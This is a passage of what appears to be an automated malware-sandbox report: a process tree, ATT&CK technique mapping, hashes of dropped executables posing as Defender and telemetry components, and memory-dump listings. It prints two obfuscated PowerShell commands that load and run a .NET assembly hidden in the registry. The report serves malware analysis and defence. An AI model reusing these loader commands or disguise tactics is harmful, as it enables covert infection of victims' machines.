qEm871/3WiEF1z7WjNllxFwih21Wpu+dScCVAIxZcfDCR27w10GDyGmnxyoK7YeQuRnBA23oNz6SPlGs+Hr7B7Bcjzbe5oekfxwIa1mU3/KH3nuDT9LLqicIbQkucemXTKEJkjUwIk2iMMLinz194tmWzsZcw6l89c1wtUF8/NbhtxfEmtIjU=
2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1124

C:\Windows\system32\taskeng.exe
taskeng.exe {37BADA9F-C772-4D80-851A-A0D5E470ACCA} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
PID:968

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+'T'+'W'+''+[Char](65)+'R'+[Char](69)+'').GetValue('d'+[Char](105)+''+[Char](97)+''+'l'+''+[Char](101)+''+'r'+''+[Char](115)+''+[Char](116)+'a'+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)
2⤵
- Drops file in System32 directory
PID:1680

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+'E').GetValue(''+'d'+''+[Char](105)+''+'a'+''+[Char](108)+'e'+'r'+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1172

C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe
"C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:588

C:\Windows\system32\taskeng.exe
taskeng.exe {AA5B21F6-CB18-4571-A15D-01007637B5BA} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]
1⤵
PID:1168

C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
2⤵
- Executes dropped EXE
PID:892

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

T1064

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Scripting

T1064

Credential Access

Credentials in Files

T1081

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Libs\g.log
Filesize
198B

MD5
37dd19b2be4fa7635ad6a2f3238c4af1

SHA1
e5b2c034636b434faee84e82e3bce3a3d3561943

SHA256
8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

SHA512
86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

Download Submit
C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe
Filesize
3.7MB

MD5
e2fb72e358e13e40ae8327c3a9df8165

SHA1
b40aceed9393e3d4c289b2cf477dd5dee76a39da

SHA256
d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408

SHA512
b209805a5194ccf70a97a57685a1765bb1ef15480994a2737084805fa21f79a285a5a1f98d0857051bc03ad98a2c90d81b33bb49cde1e955ba9898e86d8697e9

Download Submit
C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe
Filesize
3.7MB

MD5
e2fb72e358e13e40ae8327c3a9df8165

SHA1
b40aceed9393e3d4c289b2cf477dd5dee76a39da

SHA256
d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408

SHA512
b209805a5194ccf70a97a57685a1765bb1ef15480994a2737084805fa21f79a285a5a1f98d0857051bc03ad98a2c90d81b33bb49cde1e955ba9898e86d8697e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
Filesize
3.7MB

MD5
e2fb72e358e13e40ae8327c3a9df8165

SHA1
b40aceed9393e3d4c289b2cf477dd5dee76a39da

SHA256
d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408

SHA512
b209805a5194ccf70a97a57685a1765bb1ef15480994a2737084805fa21f79a285a5a1f98d0857051bc03ad98a2c90d81b33bb49cde1e955ba9898e86d8697e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
Filesize
3.7MB

MD5
e2fb72e358e13e40ae8327c3a9df8165

SHA1
b40aceed9393e3d4c289b2cf477dd5dee76a39da

SHA256
d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408

SHA512
b209805a5194ccf70a97a57685a1765bb1ef15480994a2737084805fa21f79a285a5a1f98d0857051bc03ad98a2c90d81b33bb49cde1e955ba9898e86d8697e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
Filesize
3.7MB

MD5
e2fb72e358e13e40ae8327c3a9df8165

SHA1
b40aceed9393e3d4c289b2cf477dd5dee76a39da

SHA256
d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408

SHA512
b209805a5194ccf70a97a57685a1765bb1ef15480994a2737084805fa21f79a285a5a1f98d0857051bc03ad98a2c90d81b33bb49cde1e955ba9898e86d8697e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
Filesize
3.7MB

MD5
e2fb72e358e13e40ae8327c3a9df8165

SHA1
b40aceed9393e3d4c289b2cf477dd5dee76a39da

SHA256
d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408

SHA512
b209805a5194ccf70a97a57685a1765bb1ef15480994a2737084805fa21f79a285a5a1f98d0857051bc03ad98a2c90d81b33bb49cde1e955ba9898e86d8697e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\new2.exe
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\new2.exe
Filesize
248KB

MD5
18ec6f65d276ea2173b26e7ca013190e

SHA1
f24d95a1069ccbde30ece236d72c7553689c890b

SHA256
5d5e9a03a29d4e638a175b889a5bb73fbcb0809ac83aa6966324fe86ac408d17

SHA512
33e2c237be627d032d9b1db91aa8446b06b9526f55dffc68c8eec55aedd6a747f2231dc1a4ab730590bb1a4407136b78ff6fa472643078b03dc665f781e31573

Download Submit
C:\Users\Admin\AppData\Local\Temp\new2.exe
Filesize
248KB

MD5
18ec6f65d276ea2173b26e7ca013190e

SHA1
f24d95a1069ccbde30ece236d72c7553689c890b

SHA256
5d5e9a03a29d4e638a175b889a5bb73fbcb0809ac83aa6966324fe86ac408d17

SHA512
33e2c237be627d032d9b1db91aa8446b06b9526f55dffc68c8eec55aedd6a747f2231dc1a4ab730590bb1a4407136b78ff6fa472643078b03dc665f781e31573

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
10e19e0ec58ea62297a70de80bb588ee

SHA1
c429b4c218b06f87c38b24edece0c089672ed33a

SHA256
a65756ebb47565ec5da68e0af1831d98bb1c5b1b0d641de1630ee1a6f8bb56a1

SHA512
c1022458c8fb107771f5e471daee64e111eebcfe8533d25d3ccf4cf830ef955ef7e25bbeab32c50897f4ca03a6e93fb1968647ef26b6aecd446bfd1f65d0dd5b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
10e19e0ec58ea62297a70de80bb588ee

SHA1
c429b4c218b06f87c38b24edece0c089672ed33a

SHA256
a65756ebb47565ec5da68e0af1831d98bb1c5b1b0d641de1630ee1a6f8bb56a1

SHA512
c1022458c8fb107771f5e471daee64e111eebcfe8533d25d3ccf4cf830ef955ef7e25bbeab32c50897f4ca03a6e93fb1968647ef26b6aecd446bfd1f65d0dd5b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
10e19e0ec58ea62297a70de80bb588ee

SHA1
c429b4c218b06f87c38b24edece0c089672ed33a

SHA256
a65756ebb47565ec5da68e0af1831d98bb1c5b1b0d641de1630ee1a6f8bb56a1

SHA512
c1022458c8fb107771f5e471daee64e111eebcfe8533d25d3ccf4cf830ef955ef7e25bbeab32c50897f4ca03a6e93fb1968647ef26b6aecd446bfd1f65d0dd5b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
10e19e0ec58ea62297a70de80bb588ee

SHA1
c429b4c218b06f87c38b24edece0c089672ed33a

SHA256
a65756ebb47565ec5da68e0af1831d98bb1c5b1b0d641de1630ee1a6f8bb56a1

SHA512
c1022458c8fb107771f5e471daee64e111eebcfe8533d25d3ccf4cf830ef955ef7e25bbeab32c50897f4ca03a6e93fb1968647ef26b6aecd446bfd1f65d0dd5b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
10e19e0ec58ea62297a70de80bb588ee

SHA1
c429b4c218b06f87c38b24edece0c089672ed33a

SHA256
a65756ebb47565ec5da68e0af1831d98bb1c5b1b0d641de1630ee1a6f8bb56a1

SHA512
c1022458c8fb107771f5e471daee64e111eebcfe8533d25d3ccf4cf830ef955ef7e25bbeab32c50897f4ca03a6e93fb1968647ef26b6aecd446bfd1f65d0dd5b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
1b33410fd57df279bda7cc1bd6c2d8bf

SHA1
4040890f5c453e00f94600af378bb999b08fbf6d

SHA256
99eef3c5b91b0d36119c28a50da03e04fbd8ea48343826e8d72b92cab851b511

SHA512
ce34e64e5cc985c3ed293092afb66d859dac33e5bc052de3cc1f77ec3796a06caf97690bb8d8ab5848c3bf9538689d6ad66b52826702b9b5057ca6e54aa6897a

Download Submit
C:\Windows\System32\drivers\etc\hosts
Filesize
2KB

MD5
4ac8a26e2cee1347880edccb47ab30ea

SHA1
a629f6d453014c9dccb98987e1f4b0a3d4bdd460

SHA256
de574c85b289f23bba4b932a4c48397c4c61904cb6df086726dd7f8049624c3a

SHA512
fc2af80b2e84ae114ae06144b9ec41eed50250e20f18db3d114ac8d2c59ebbfcd440f59d12f173ea6a94bcf394b0cecee9e120265112b7043bf9e2bd636d6a8a

Download Submit
C:\Windows\System32\drivers\etc\hosts
Filesize
2KB

MD5
4ac8a26e2cee1347880edccb47ab30ea

SHA1
a629f6d453014c9dccb98987e1f4b0a3d4bdd460

SHA256
de574c85b289f23bba4b932a4c48397c4c61904cb6df086726dd7f8049624c3a

SHA512
fc2af80b2e84ae114ae06144b9ec41eed50250e20f18db3d114ac8d2c59ebbfcd440f59d12f173ea6a94bcf394b0cecee9e120265112b7043bf9e2bd636d6a8a

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe
Filesize
3.7MB

MD5
e2fb72e358e13e40ae8327c3a9df8165

SHA1
b40aceed9393e3d4c289b2cf477dd5dee76a39da

SHA256
d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408

SHA512
b209805a5194ccf70a97a57685a1765bb1ef15480994a2737084805fa21f79a285a5a1f98d0857051bc03ad98a2c90d81b33bb49cde1e955ba9898e86d8697e9

Download Submit
\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
Filesize
3.7MB

MD5
e2fb72e358e13e40ae8327c3a9df8165

SHA1
b40aceed9393e3d4c289b2cf477dd5dee76a39da

SHA256
d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408

SHA512
b209805a5194ccf70a97a57685a1765bb1ef15480994a2737084805fa21f79a285a5a1f98d0857051bc03ad98a2c90d81b33bb49cde1e955ba9898e86d8697e9

Download Submit
\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
Filesize
3.7MB

MD5
e2fb72e358e13e40ae8327c3a9df8165

SHA1
b40aceed9393e3d4c289b2cf477dd5dee76a39da

SHA256
d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408

SHA512
b209805a5194ccf70a97a57685a1765bb1ef15480994a2737084805fa21f79a285a5a1f98d0857051bc03ad98a2c90d81b33bb49cde1e955ba9898e86d8697e9

Download Submit
\Users\Admin\AppData\Local\Temp\SysApp.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
\Users\Admin\AppData\Local\Temp\SysApp.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
\Users\Admin\AppData\Local\Temp\SysApp.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
\Users\Admin\AppData\Local\Temp\SysApp.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
\Users\Admin\AppData\Local\Temp\new2.exe
Filesize
248KB

MD5
18ec6f65d276ea2173b26e7ca013190e

SHA1
f24d95a1069ccbde30ece236d72c7553689c890b

SHA256
5d5e9a03a29d4e638a175b889a5bb73fbcb0809ac83aa6966324fe86ac408d17

SHA512
33e2c237be627d032d9b1db91aa8446b06b9526f55dffc68c8eec55aedd6a747f2231dc1a4ab730590bb1a4407136b78ff6fa472643078b03dc665f781e31573

Download Submit
\Users\Admin\AppData\Local\Temp\new2.exe
Filesize
248KB

MD5
18ec6f65d276ea2173b26e7ca013190e

SHA1
f24d95a1069ccbde30ece236d72c7553689c890b

SHA256
5d5e9a03a29d4e638a175b889a5bb73fbcb0809ac83aa6966324fe86ac408d17

SHA512
33e2c237be627d032d9b1db91aa8446b06b9526f55dffc68c8eec55aedd6a747f2231dc1a4ab730590bb1a4407136b78ff6fa472643078b03dc665f781e31573

Download Submit
memory/108-222-0x000000000263B000-0x000000000265A000-memory.dmp

Filesize
124KB

Download
memory/108-223-0x000000000263B000-0x000000000265A000-memory.dmp

Filesize
124KB

Download
memory/108-217-0x000007FEF4090000-0x000007FEF4AB3000-memory.dmp

Filesize
10.1MB

Download
memory/108-221-0x0000000002634000-0x0000000002637000-memory.dmp

Filesize
12KB

Download
memory/284-225-0x0000000000000000-mapping.dmp

Download
memory/300-129-0x0000000140001938-mapping.dmp

Download
memory/436-286-0x0000000000000000-mapping.dmp

Download
memory/472-69-0x0000000000000000-mapping.dmp

Download
memory/560-211-0x0000000000000000-mapping.dmp

Download
memory/572-142-0x000007FEF4090000-0x000007FEF4AB3000-memory.dmp

Filesize
10.1MB

Download
memory/572-147-0x00000000025E4000-0x00000000025E7000-memory.dmp

Filesize
12KB

Download
memory/572-154-0x00000000025EB000-0x000000000260A000-memory.dmp

Filesize
124KB

Download
memory/572-153-0x00000000025E4000-0x00000000025E7000-memory.dmp

Filesize
12KB

Download
memory/572-151-0x00000000025EB000-0x000000000260A000-memory.dmp

Filesize
124KB

Download
memory/572-144-0x000007FEEF080000-0x000007FEEFBDD000-memory.dmp

Filesize
11.4MB

Download
memory/572-235-0x0000000000000000-mapping.dmp

Download
memory/580-179-0x0000000000000000-mapping.dmp

Download
memory/588-156-0x0000000000000000-mapping.dmp

Download
memory/700-244-0x0000000002884000-0x0000000002887000-memory.dmp

Filesize
12KB

Download
memory/700-242-0x000000000288B000-0x00000000028AA000-memory.dmp

Filesize
124KB

Download
memory/700-239-0x0000000002884000-0x0000000002887000-memory.dmp

Filesize
12KB

Download
memory/700-245-0x000000000288B000-0x00000000028AA000-memory.dmp

Filesize
124KB

Download
memory/748-93-0x0000000000000000-mapping.dmp

Download
memory/796-152-0x0000000000000000-mapping.dmp

Download
memory/892-280-0x0000000002200000-0x000000000233D000-memory.dmp

Filesize
1.2MB

Download
memory/892-264-0x0000000000000000-mapping.dmp

Download
memory/892-274-0x0000000002200000-0x000000000233D000-memory.dmp

Filesize
1.2MB

Download
memory/892-279-0x0000000001CF0000-0x00000000021F4000-memory.dmp

Filesize
5.0MB

Download
memory/892-270-0x0000000001CF0000-0x00000000021F4000-memory.dmp

Filesize
5.0MB

Download
memory/956-170-0x0000000000000000-mapping.dmp

Download
memory/976-198-0x0000000000000000-mapping.dmp

Download
memory/976-266-0x00000001400014E0-mapping.dmp

Download
memory/1004-184-0x0000000000000000-mapping.dmp

Download
memory/1012-146-0x000000006D930000-0x000000006DEDB000-memory.dmp

Filesize
5.7MB

Download
memory/1012-140-0x0000000000000000-mapping.dmp

Download
memory/1012-94-0x0000000000000000-mapping.dmp

Download
memory/1012-247-0x0000000140001938-mapping.dmp

Download
memory/1012-200-0x000000006D930000-0x000000006DEDB000-memory.dmp

Filesize
5.7MB

Download
memory/1124-113-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/1124-111-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/1124-121-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/1124-275-0x00000001407F2720-mapping.dmp

Download
memory/1124-277-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/1124-278-0x0000000000000000-0x0000000001000000-memory.dmp

Filesize
16.0MB

Download
memory/1124-118-0x000000000041ADAE-mapping.dmp

Download
memory/1124-120-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/1124-283-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/1124-243-0x0000000000000000-mapping.dmp

Download
memory/1148-71-0x0000000000000000-mapping.dmp

Download
memory/1148-119-0x00000000001B0000-0x00000000001EE000-memory.dmp

Filesize
248KB

Download
memory/1168-91-0x0000000002874000-0x0000000002877000-memory.dmp

Filesize
12KB

Download
memory/1168-92-0x000000000287B000-0x000000000289A000-memory.dmp

Filesize
124KB

Download
memory/1168-81-0x000007FEFBD01000-0x000007FEFBD03000-memory.dmp

Filesize
8KB

Download
memory/1168-83-0x000007FEF4090000-0x000007FEF4AB3000-memory.dmp

Filesize
10.1MB

Download
memory/1168-88-0x0000000002874000-0x0000000002877000-memory.dmp

Filesize
12KB

Download
memory/1168-90-0x000000000287B000-0x000000000289A000-memory.dmp

Filesize
124KB

Download
memory/1172-104-0x0000000000000000-mapping.dmp

Download
memory/1172-168-0x000007FEEF080000-0x000007FEEFBDD000-memory.dmp

Filesize
11.4MB

Download
memory/1172-289-0x00000000772E0000-0x0000000077489000-memory.dmp

Filesize
1.7MB

Download
memory/1172-175-0x00000000011FB000-0x000000000121A000-memory.dmp

Filesize
124KB

Download
memory/1172-174-0x00000000011F4000-0x00000000011F7000-memory.dmp

Filesize
12KB

Download
memory/1172-167-0x000007FEF4090000-0x000007FEF4AB3000-memory.dmp

Filesize
10.1MB

Download
memory/1172-149-0x0000000000000000-mapping.dmp

Download
memory/1172-241-0x00000000011FB000-0x000000000121A000-memory.dmp

Filesize
124KB

Download
memory/1212-99-0x0000000000000000-mapping.dmp

Download
memory/1252-190-0x0000000000000000-mapping.dmp

Download
memory/1252-231-0x0000000000000000-mapping.dmp

Download
memory/1340-229-0x0000000000000000-mapping.dmp

Download
memory/1348-188-0x0000000000000000-mapping.dmp

Download
memory/1360-96-0x0000000000000000-mapping.dmp

Download
memory/1384-177-0x0000000000000000-mapping.dmp

Download
memory/1388-210-0x0000000000401159-mapping.dmp

Download
memory/1396-287-0x0000000000700000-0x000000000083D000-memory.dmp

Filesize
1.2MB

Download
memory/1396-262-0x0000000000700000-0x000000000083D000-memory.dmp

Filesize
1.2MB

Download
memory/1396-213-0x0000000001F80000-0x0000000002484000-memory.dmp

Filesize
5.0MB

Download
memory/1396-219-0x0000000000700000-0x000000000083D000-memory.dmp

Filesize
1.2MB

Download
memory/1396-195-0x0000000000000000-mapping.dmp

Download
memory/1396-216-0x0000000000700000-0x000000000083D000-memory.dmp

Filesize
1.2MB

Download
memory/1396-209-0x0000000001F80000-0x0000000002484000-memory.dmp

Filesize
5.0MB

Download
memory/1396-282-0x000000000DCB0000-0x000000000DD07000-memory.dmp

Filesize
348KB

Download
memory/1412-185-0x0000000000000000-mapping.dmp

Download
memory/1456-160-0x000007FEF36F0000-0x000007FEF4113000-memory.dmp

Filesize
10.1MB

Download
memory/1456-164-0x000000000110B000-0x000000000112A000-memory.dmp

Filesize
124KB

Download
memory/1456-163-0x0000000001104000-0x0000000001107000-memory.dmp

Filesize
12KB

Download
memory/1456-162-0x0000000001104000-0x0000000001107000-memory.dmp

Filesize
12KB

Download
memory/1456-161-0x000007FEF28F0000-0x000007FEF344D000-memory.dmp

Filesize
11.4MB

Download
memory/1508-173-0x0000000000000000-mapping.dmp

Download
memory/1512-80-0x0000000073320000-0x00000000738CB000-memory.dmp

Filesize
5.7MB

Download
memory/1512-68-0x0000000073320000-0x00000000738CB000-memory.dmp

Filesize
5.7MB

Download
memory/1512-66-0x0000000000000000-mapping.dmp

Download
memory/1516-101-0x0000000000000000-mapping.dmp

Download
memory/1532-97-0x0000000000000000-mapping.dmp

Download
memory/1540-78-0x0000000000000000-mapping.dmp

Download
memory/1548-134-0x0000000000401159-mapping.dmp

Download
memory/1560-102-0x0000000000000000-mapping.dmp

Download
memory/1564-255-0x0000000002514000-0x0000000002517000-memory.dmp

Filesize
12KB

Download
memory/1564-257-0x000000000251B000-0x000000000253A000-memory.dmp

Filesize
124KB

Download
memory/1564-256-0x000000000251B000-0x000000000253A000-memory.dmp

Filesize
124KB

Download
memory/1592-234-0x0000000000000000-mapping.dmp

Download
memory/1596-178-0x0000000000000000-mapping.dmp

Download
memory/1604-65-0x0000000000000000-mapping.dmp

Download
memory/1628-98-0x0000000000000000-mapping.dmp

Download
memory/1644-233-0x0000000000000000-mapping.dmp

Download
memory/1656-171-0x000007FEF4090000-0x000007FEF4AB3000-memory.dmp

Filesize
10.1MB

Download
memory/1656-176-0x0000000001094000-0x0000000001097000-memory.dmp

Filesize
12KB

Download
memory/1656-172-0x000007FEEF080000-0x000007FEEFBDD000-memory.dmp

Filesize
11.4MB

Download
memory/1656-183-0x000000000109B000-0x00000000010BA000-memory.dmp

Filesize
124KB

Download
memory/1656-182-0x0000000001094000-0x0000000001097000-memory.dmp

Filesize
12KB

Download
memory/1680-103-0x0000000000000000-mapping.dmp

Download
memory/1680-148-0x0000000000000000-mapping.dmp

Download
memory/1712-181-0x0000000000000000-mapping.dmp

Download
memory/1720-180-0x0000000000000000-mapping.dmp

Download
memory/1720-110-0x0000000000000000-mapping.dmp

Download
memory/1724-64-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1724-63-0x00000000751A1000-0x00000000751A3000-memory.dmp

Filesize
8KB

Download
memory/1724-62-0x0000000000401159-mapping.dmp

Download
memory/1724-56-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1724-54-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1736-105-0x000007FEF36F0000-0x000007FEF4113000-memory.dmp

Filesize
10.1MB

Download
memory/1736-123-0x00000000023AB000-0x00000000023CA000-memory.dmp

Filesize
124KB

Download
memory/1736-106-0x00000000023A4000-0x00000000023A7000-memory.dmp

Filesize
12KB

Download
memory/1736-122-0x00000000023A4000-0x00000000023A7000-memory.dmp

Filesize
12KB

Download
memory/1744-267-0x0000000000000000-mapping.dmp

Download
memory/1756-236-0x0000000000000000-mapping.dmp

Download
memory/1756-137-0x0000000000000000-mapping.dmp

Download
memory/1776-84-0x0000000001ED0000-0x00000000023D4000-memory.dmp

Filesize
5.0MB

Download
memory/1776-254-0x000000000BA40000-0x000000000BA97000-memory.dmp

Filesize
348KB

Download
memory/1776-86-0x00000000002B0000-0x00000000003ED000-memory.dmp

Filesize
1.2MB

Download
memory/1776-85-0x00000000002B0000-0x00000000003ED000-memory.dmp

Filesize
1.2MB

Download
memory/1776-109-0x00000000002B0000-0x00000000003ED000-memory.dmp

Filesize
1.2MB

Download
memory/1776-82-0x0000000001ED0000-0x00000000023D4000-memory.dmp

Filesize
5.0MB

Download
memory/1776-108-0x0000000001ED0000-0x00000000023D4000-memory.dmp

Filesize
5.0MB

Download
